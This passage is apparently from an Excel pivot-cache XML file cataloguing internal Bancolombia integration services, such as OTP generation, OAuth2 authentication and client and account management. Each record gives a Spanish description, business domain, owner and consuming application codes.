    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generacion Token"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que hace uso de la capacidad de generación de PINES del iSeries, el token generado se podrá enviar al correo electrónico o como mensaje de texto ( SMS) al celular del individuo que se desea autenticar."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_NU0034001 _x000d__x000a_AW1097001 _x000d__x000a_AW0638 _x000d__x000a_NU0127001 _x000d__x000a_AW1206001 _x000d__x000a_AW1170 _x000d__x000a_NU0104001 _x000d__x000a_NU0014001 _x000d__x000a_AW1165 _x000d__x000a_NU0004001 _x000d__x000a_AW1287 _x000d__x000a_AW1150 _x000d__x000a_AW1128 _x000d__x000a_AW1312001 _x000d__x000a_AW0955 _x000d__x000a_AW0939 _x000d__x000a_AW1011 _x000d__x000a_AW0638001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001 _x000d__x000a_AW1203001 _x000d__x000a_AW1316 _x000d__x000a_NU01270012 _x000d__x000a_NU0046001 _x000d__x000a_AW0660 _x000d__x000a_AW1435001 _x000d__x000a_AW1299001 _x000d__x000a_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generar Codigo Seguridad"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio implementa la funcionalidad para generar el código de seguridad en IAM y enviarlo a través del Componente de Alertas al cliente, permitiéndole así generar su clave principal."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generar OTP"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v=" Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID._x005f_x000D_ _x005f_x000D_ El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP._x005f_x000D_ _x005f_x000D_ El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente._x005f_x000D_ Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW0638"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generar OTP"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID._x000a_ _x000a_ El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP._x000a_ _x000a_ El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente._x000a_ Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_NU0004001 _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_AW1185001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0100001 _x000d__x000a_AW1316001 _x000d__x000a_AW1277001 _x000d__x000a_NU0199001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Alertas y Notificaciones"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Para la comunicación de las transacciones realizadas por un usuario Bancolombia, se provee el servicio de Alertas y Notificaciones, el cual consiste en el envío de una notificación a los medios que el usuario haya autorizado al momento de inscribirse. Esta notificación hará referencia a la los temas que al cliente se le haya configurado previamente en el paquete de alertas en su inscripción al sistema o que él mismo haya personalizado en la Sucursal Virtual Personas o sucursal física. Estas notificaciones incluyen notificar los débitos de las cuentas de ahorro, cuentas de crédito, entre otras.  Con el presente servicio inicialmente se pretende realizar la inscripción en tiempo real al sistema y se hará una vez el cliente se haya vinculado y aperturado un producto en Bancolombia. Dado que un usuario podría inscribirse entregando solo número de celular o solo correo electrónico o los datos, se crean dos operaciones indicando a que tipo de notificación se suscribe el usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="AW1177 _x000d__x000a_AW1128 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Anexo Cinco"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionAnexoCinco V1.0, permitirá a los canales digitales, generar el anexo5 del servicio digital y el anexo5 de restructuraciones y reservas que se realicen manualmente por el portal transaccional para poder realizar el registro de la garantía ante el Fondo Nacional de Garantias. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Fondo Nacional de Garantias"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Archivo Recaudo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Archivo Recaudo permite gestionar los archivos del recaudador, como su anulación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Autenticacion Fuerte"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite gestionar el proceso de enrolamiento de un cliente al sistema de autenticación fuerte de Bancolombia."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="AutenticacionFuertes"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW1287 _x000d__x000a_AW0856 _x000d__x000a_AW1313 _x000d__x000a_AW0638 _x000d__x000a_AW1170 _x000d__x000a_AW1128 _x000d__x000a_AW1203001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Autenticacion OAuth2"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio es el encargado de la gestión de autenticación Oauth2.0 configurado en WAS, en esta primera versión se tiene la operación cambiarCodigoAutorizacionPorToken que será la encargada de intercambiar el código de autorización por el token de acceso y en posteriores versiones se agregarán funcionalidades respecto a la autenticación OAuth2.0.&amp;"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1281002 _x000d__x000a_NU0021001 _x000d__x000a_NU0143001 _x000d__x000a_NU0104001 _x000d__x000a_AW1333002 _x000d__x000a_AW1190001 _x000d__x000a_AW0453001 _x000d__x000a_NU0004001 _x000d__x000a_AW1128 _x000d__x000a_APICONNECT _x000d__x000a_AW1281003 _x000d__x000a_NU0035001 _x000d__x000a_AW1218001 _x000d__x000a_NU0046001 _x000d__x000a_AW1291001 _x000d__x000a_NU0094001 _x000d__x000a_NU0162001 _x000d__x000a_AW1277001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0170001 _x000d__x000a_NU0199001 _x000d__x000a_AW1435001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Beneficiario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Beneficiario permitirá realizar la gestión sobre los beneficiarios de los pagadores, podrán realizar procesos de inscripción de beneficiarios y consultas, pueden ser beneficiario con cuenta en el banco u otras entidades, para pagos por lotes. Esté aplica para los recaudadores que prefieren por seguridad realizar pagos a beneficiarios ya inscritos, en caso de no estar inscrito el pago se rechazará. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Clasificacion Riesgo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite consultar la validación de las reglas LAFT a las personas o empresas que desean adquirir un producto o un servicio del Grupo Bancolombia, para garantizar un adecuado conocimiento de estos y cumplir con la normatividad expedida por la Superintendencia Financiera de Colombia y la normatividad SARLAF para identificar si esta persona es un potencial cliente del Grupo Bancolombia."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="AW0611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Clave Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como alcance la gestión, administración y consultas que se puedan realizar sobre la clave Banco o primera clave del cliente. Dentro de sus operaciones considera: una capacidad para el bloqueo de clave, otra para la consulta de novedades de cambio de clave y una última que se adiciona en esta nueva versión del servicio para consultar el estado y la existencia de clave banco."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1185001 _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite la creación y modificación de la información del cliente directamente en maestro de clientes del banco (MDM). Un proyecto que consuma el servicio puede crear un nuevo cliente en MDM, para la creación puede asignar información de atributos del cliente como lo son: Datos personales, datos de contacto, datos comerciales, datos de las relaciones del cliente, datos financieros y datos tributarios, así mismo un proyecto podrá modificar/actualizar la información de un cliente existente en el maestro da clientes del banco. Este servicio aplica tanto para persona jurídica, como para persona natural.  Este servicio no realiza la función de vinculación o desvinculación de clientes en el banco, este servicio se encuentra disponible es para la creación o modificación de clientes en MDM. Cuando un cliente es creado o actualizado a través de este servicio, será información que se convertirá en registro de oro del cliente, lo cual indica que podrá ser consultada por otros consumidores a través de los servicios de MDM de consulta del cliente. Cuando el cliente es creado o modificado en MDM se sincronizará en tiempo real con CRM y CIF."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW1074001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Giros"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="GestionClienteGiros ofrece a sus consumidores la posibilidad de consultar, actualizar y registrar un cliente en la aplicación de giros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <s v="Monica Cecilia Gallego Rengifo"/>
    <m/>
    <s v="GIR-Giros Nacionales Multicanal_ISGIR001"/>
    <s v="AW1227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Cliente Leasing permitirá a los consumidores consultar y más adelante modificar información relacionada con los clientes de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Pagador"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Cliente Pagador permitirá realizar gestión sobre sus pagadores, la inscripción de un cliente pagador realizada a partir del nit y la consulta del cliente pagador, donde se podrán visualizar todos los parámetros de su inscripción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Pago Nomina"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionClientePagoNomina permite a las pequeñas y grandes empresas, realizar su inscripción de cliente (persona natural o jurídica) al servicio de pago de nómina. Lo anterior con el fin de tener el registro de dicho cliente en el sistema de pagos para que posteriormente el cliente pueda realizar el pago de su nómina. Este servicio también permite consultar si el cliente se encuentra registrado en pago de nómina."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Valores"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionClienteValores permitirá a los consumidores realizar la creación de nuevos clientes en valores y/o modificar la información de un cliente ya existente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Codigo Autorizacion"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El código de autorización garantiza que un cliente se autenticó de forma exitosa._x000a_Este servicio permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar de dos formas; usando las credenciales cifradas del cliente (Cuando el Cliente se autentica) o a partir de un token existente (Single Sign ON) este último ocurre cuando se delega la sesión a un nuevo consumidor. _x000a_"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1281002 _x000d__x000a_AW1128 _x000d__x000a_AW0955 _x000d__x000a_NU0051001 _x000d__x000a_AW0955001 _x000d__x000a_AW1291001 _x000d__x000a_AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0170001 _x000d__x000a_AW1435001 _x000d__x000a_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Codigos Comercio Adquirencia"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Códigos Comercio Adquirencia permitirá consultar y actualizar códigos de comercio únicos a nivel nacional y consultar radicados de solicitudes de afiliación para las tres franquicias Visa, Mastercard y Amex."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación de Pagos"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="ADQUIRENCIA MEDIOS DE PAGO_ISADQ0001"/>
    <s v="AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Comercios Adquirencia"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Comercios Adquirencia permitirá a los consumidores inicialmente consultar y actualizar información de los comercios afiliados al producto adquirencia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación de Pagos"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="ADQUIRENCIA MEDIOS DE PAGO_ISADQ0001"/>
    <s v="AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Comision Transferencias Externas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestion Comision Transferencias Externas tiene como objetivo realizar funcionalidades propias relacionadas con las comisiones que se cobran al momento de realizar una transferencia internacional para filiales del exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Comisiones Filiales"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como objetivo obtener una comisión en específico. Se toman en cuenta todas las comisiones que se manejan en las Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Conciliacion Clientes"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionConciliacionClientes, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Conciliacion Clientes"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionConciliacionClientes, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1294001 _x000d__x000a_NU0021001 _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuenta Fly Pass"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" El servicio GestionCuentaFlyPass tiene como Objetivo alojar algunas operaciones, que son necesarios para exponer una funcionalidad a la iniciativa de Recaudo Electrónico Vehicular, la cual expondrá la funcionalidad desde Data Power."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="AW1150"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas ACH"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Cuentas ACH tiene como objetivo realizar funcionalidades propias con las cuentas ACH que no tienen que ver con afectación monetaria, tales como inscripción de cuentas ACH, consultas de cuentas ACH, etc."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas AFC"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Las operaciones de este servicio son las que permiten hacer notificaciones al aplicativo AFC (caso de la apertura de la cuenta AFC en Finacle), o disminuir la operatividad del cajero en la oficina (caso de la grabación del Pate). "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
    <s v="BVD _x000d__x000a_AW0210001 _x000d__x000a_AFC _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas Deposito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Cuentas Deposito tiene como objetivo realizar funcionalidades propias con las cuentas de Depósitos, que no tienen que ver con afectación monetaria, tales como inscripción de cuentas, consultas de cuentas, etc."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite la gestión (creación/modificación/eliminación) de cuentas de ahorro/corriente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez "/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AFC _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Datos Cliente Sufi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite la actualización, creación de los datos generales de un cliente en sufi y otras operaciones relacionadas con la administración de los datos del cliente para esta versión solo queda especificada para la actualización de la información general. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="AW1312001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
